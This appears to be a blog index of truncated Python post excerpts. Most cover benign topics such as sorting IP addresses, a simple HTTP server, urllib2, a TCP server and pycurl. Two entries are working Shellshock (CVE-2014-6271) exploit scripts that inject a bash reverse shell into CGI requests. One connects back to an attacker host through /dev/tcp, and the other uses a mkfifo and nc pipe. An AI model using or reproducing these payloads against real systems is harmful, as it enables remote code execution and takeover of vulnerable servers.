Python tools If you are involved in vulnerability research

If you are involved in vulnerability research, reverse engineering or penetration testing, I suggest to try out the Python programming language. It has a rich set of useful libraries and programs. This page lists some of them. Most of the listed tools are written in Python, others are just Python bindings for existing C libraries, i.e. they make those libraries …

Sorting IP addresses

How to sort a list of strings that represent IP addresses? Of course, you could supply an appropriate comparison function to the sort() method of the list object, but that’s very inefficient (read: slow). It is better to first pre-process the list so it can be sorted with the efficient built-in comparison function (which simply compares strings character-by-character), and afterwards …

collection of some useful shortcuts

The following are just a collection of some useful shortcuts and tools I’ve found in Python over the years. Hopefully you find them helpful. Swapping Variables 1 2 3 4 5 6 7 8 x = 6 y = 5 x, y = y, x print x >>> 5 print y >>> 6 Inline if Statement 1 2 print “Hello” …

Check if a file exists in a directory

With Python there are several methods which can be used to check if a file exists, in a certain directory. When checking if a file exists, often it is performed right before accessing (reading and/or writing) a file. Below we will go through each method of checking if a file exists (and whether it is accessible), and discuss some of …

A simple HTTP Server

A simple HTTP Server can be started in seconds. python -m SimpleHTTPServer For Python3: python -m http.server The server starts on port 8000 by default which can be changed. I have found this quite handy at times. For example: To share a complete directory with someone over the Internet, I cd to the directory and start the server. The directory …

HOWTO Fetch Internet Resources Using urllib2

Author: Michael Foord Introduction Related Articles You may also find useful the following article on fetching web resources with Python: Basic Authentication A tutorial on Basic Authentication, with examples in Python. urllib2 is a Python module for fetching URLs (Uniform Resource Locators). It offers a very simple interface, in the form of the urlopen function. This is capable of fetching …

TCP server demo in Python

import socket import threading bind_ip = “0.0.0.0” bind_port = 9999 server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.bind((bind_ip,bind_port)) server.listen(5) print “[*] Listening on %s:%d” % (bind_ip,bind_port) # this is our client-handling thread def handle_client(client_socket): # print out what the client sends request = client_socket.recv(1024) print “[*] Received: %s” % request # send back a packet client_socket.send(“ACK!”) client_socket.close() while True: client,addr = server.accept() print …

Python Quickstart: Creating a template and deployment

At the end of this quickstart, you should know how to: Use a local discovery document Authorize to the API using the OAuth 2.0 client library (included in the Python client library) Create your own template, and deploy resources Before you can run this quickstart, you must: Sign up and enable Deployment Manager. Enable Google Compute Engine if you haven’t …

CVE-2014-6271 cgi-bin reverse shell (shellshock)

# #CVE-2014-6271 cgi-bin reverse shell # import httplib,urllib,sys if (len(sys.argv)<3):         print “Usage: %s <host> <vulnerable CGI>” % sys.argv[0]         print “Example: %s localhost /cgi-bin/test.cgi” % sys.argv[0]         exit(0) conn = httplib.HTTPConnection(sys.argv[1]) reverse_shell=“() { ignored;};/bin/bash -c ‘/bin/rm -f /tmp/f; /usr/bin/mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 1234 …

Check vulnerable reverse shell CGI (shellshock)

# #CVE-2014-6271 cgi-bin reverse shell # import httplib,urllib,sys if (len(sys.argv)<4):         print “Usage: %s <host> <vulnerable CGI> <attackhost/IP>” % sys.argv[0]         print “Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080” % sys.argv[0]         exit(0) conn = httplib.HTTPConnection(sys.argv[1]) reverse_shell=“() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1” % sys.argv[3] headers = {“Content-type”: “application/x-www-form-urlencoded”,         …

Curl websites from Phyton

#! /usr/bin/env python # -*- coding: iso-8859-1 -*- # vi:ts=4:et # $Id: test_multi_socket_select.py $ import os, sys try: from cStringIO import StringIO except ImportError: from StringIO import StringIO import pycurl import select sockets = set() timeout = 0 urls = ( “http://www.area-6.co.uk”, “http://www.python.org”, “http://www.sourceforge.net”, ) # Read list of URIs from file specified on commandline try: urls = open(sys.argv[1], “rb”).readlines() …

phyton – GB File Conversion

######### Pseudocode ########## # For main () # prompt user to input amount of gb, assign to gb # convert gb to 1,000,000,000 bytes x gb(float) input, assign to gbyte # run gbyte function, passing to gif, jpeg, png, and tiff. # assume all images have a resolution of 800x600px # GIF=(gbyte)/(800x600x1/5) images in GIF format can be stored. # …

Top 10 Mistakes that Python Programmers Make

An interesting article about Python. Python’s simple, easy-to-learn syntax can mislead Python developers — especially those who are newer to the language — into missing some of its subtleties and underestimating the power of the language. This is a list of somewhat subtle, harder-to-catch mistakes that can trip up even the most advanced Python developer. Read more following the link …

wxPython

wxPython, a blending of the wxWidgets C++ class library with the Python programming language. Windows  with python http://www.wxpython.org/index.php

Python Programming

I find python easy for beginners and powerful for many apps. Check this page for documentation and material. https://www.python.org/doc/